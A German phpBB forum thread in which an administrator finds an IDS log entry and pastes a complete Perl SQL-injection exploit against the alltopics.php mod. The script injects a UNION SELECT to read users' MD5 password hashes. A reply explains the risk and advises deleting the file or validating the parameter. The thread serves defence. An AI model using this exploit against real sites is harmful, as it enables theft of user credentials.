Seite 1 von 1

sicherheits probleme?

Verfasst: 30.08.2006 00:25
von der-rene
Hallo,

in der Log Datei trat folgendes auf...

IDS:r57 phpBB2 exploit a2e2#20022006|http://meineurl/phpBB2/|admin|password|2|phpbb_

was heisst das denn?

und was hat dieser code zu bedeuten ? mus sich angst haben?

Code: Alles auswählen

#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                    +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+                                                    +
+                  bd0rk || SOH-Crew                 +
+                                                    +
+    Mod: http://www.phpbbhacks.com/download/2821    +
+                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_
users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
lg der panische rené

Re: sicherheits probleme?

Verfasst: 30.08.2006 17:18
von h-o
der-rene hat geschrieben:mus sich angst haben?
Wenn du alltopics.php einsetzt, dann ja (aus der Logdatei geht das ja nicht hervor).

Mit obigem Code lassen sich die mit MD5-verschlüsselten Passwörter (sog. MD5-Hashes) aus der Datenbank auslesen. Das wäre alleine nicht so tragisch, wenn es nicht diverse MD5 "Reverse Engineer's" gäbe (auf die der Autor dieses Hacks übrigens von seiner Homepage aus verweist), so dass aus den MD5-Hashes die "echten" Passwörter zum Einloggen angezeigt werden können.

Lösche also die alltopics.php, sofern vorhanden (theoretisch könntest du wohl auch $start auf sinnvolle numerische Daten prüfen).

Der Hack-Autor ist übrigens der gleiche, der vor ein paar Wochen offenbar ein Sicherheitsproblemchen ausgerechnet im Cracker Tracker 4.1.7 entdeckt hat. Steht zumindest auf seiner Homepage. Da dürfte es Anwender des CT-MODs wohl nur wenig trösten, dass der Hack-Autor in seinem "Support-Forum" selbst phpBB und CT einsetzt :D